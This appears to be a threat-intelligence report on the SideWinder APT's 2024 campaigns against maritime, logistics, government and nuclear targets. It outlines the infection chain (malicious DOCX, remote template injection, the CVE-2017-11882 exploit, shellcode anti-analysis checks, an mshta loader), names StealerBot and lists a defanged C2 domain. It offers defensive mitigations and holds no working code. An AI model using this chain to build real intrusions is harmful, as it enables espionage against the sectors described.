Full Report
In this article, we discuss the tools and TTPs used in the SideWinder APT's attacks in H2 2024, as well as shifts in its targets, such as an increase in attacks against the maritime and logistics sectors.
Analysis Summary
# Threat Actor: SideWinder
## Attribution & Identity
Highly prolific Advanced Persistent Threat (APT) group. Primarily associated with targeting military and government entities in Pakistan, Sri Lanka, China, and Nepal. Continues to actively update its toolset and infrastructure.
## Activity Summary
SideWinder demonstrated intense activity in the second half of 2024, updating its toolset and creating massive infrastructure. The group continued targeting government entities but showed a **significant strategic increase** in attacks against **maritime infrastructures and logistics companies**. Observed activities included intense monitoring of security detections and rapidly updating tools (often in under five hours) when compromises were found. In late 2024, observed activity included a significant number of attacks in Djibouti, followed by a focus on entities in Asia, with a strong interest in targets within Egypt, and further expansion into new African countries. Noted specific interest in nuclear power plants and nuclear energy in South Asia.
## Tactics, Techniques & Procedures
- **Infection Vector:** Spear-phishing emails containing malicious DOCX files.
- **Remote Template Injection:** The DOCX file utilizes remote template injection to download an RTF file from an attacker-controlled server.
- **Exploitation:** Exploits a known vulnerability in the RTF file (**CVE-2017-11882**) to run malicious shellcode.
- **Shellcode Execution:** Contains updated shellcode that uses anti-analysis techniques (checking RAM size via `GlobalMemoryStatusEx`, attempting to load `nlssorting.dll` and terminating if successful). The shellcode invokes `mshtml.RunHTMLApplication`.
- **Loader Execution:** Executes the Windows utility `mshta.exe` to download an additional payload (a malicious HTA file) from a remote server.
- **Persistence/Evasion:** Constantly monitors security detections, quickly generates new malware versions, and changes persistence techniques and file paths/names upon detection.
## Targeting
- Sectors: Maritime infrastructures, logistics companies, government entities (national ministries, diplomatic entities), nuclear energy/power plants.
- Geography: South and Southeast Asia, the Middle East, Africa (including Djibouti and Egypt).
- Victims: Government entities, logistics companies, maritime infrastructures, nuclear energy agencies.
## Tools & Infrastructure
- Malware Families:
- **Backdoor Loader:** A malware component installed via the initial infection chain.
- **StealerBot:** A private post-exploitation toolkit used exclusively by SideWinder.
- Infrastructure:
- C2/Download Servers utilizing domains such as `dgtk.depo-govpk[.]com`. (Note: Full URL construction seen: `hxxps://dgtk.depo-govpk[.]com/19263687/trui`)
## Implications
SideWinder represents a sophisticated, high-velocity threat actor capable of rapid adaptation. Their concentrated focus on maritime and nuclear sectors suggests potential state-sponsored espionage or critical infrastructure disruption capabilities in key global trade and energy regions. Their speed in updating tools post-detection makes them difficult to maintain detection coverage against.
## Mitigations
- Implement rigorous email filtering and sandbox analysis for all incoming documents, especially DOCX and RTF formats.
- Apply patches for CVE-2017-11882 immediately, as it remains a primary initial access vector.
- Monitor for the use of legitimate Windows utilities like `mshta.exe` to download remote content, especially in connection with Office document processing.
- Enhance monitoring for suspicious processes spawning from document handlers, looking for obfuscated JavaScript or shellcode execution signatures.
- Establish high-fidelity behavioral detections for the malware loading stages ("Backdoor Loader" and "StealerBot" behavior).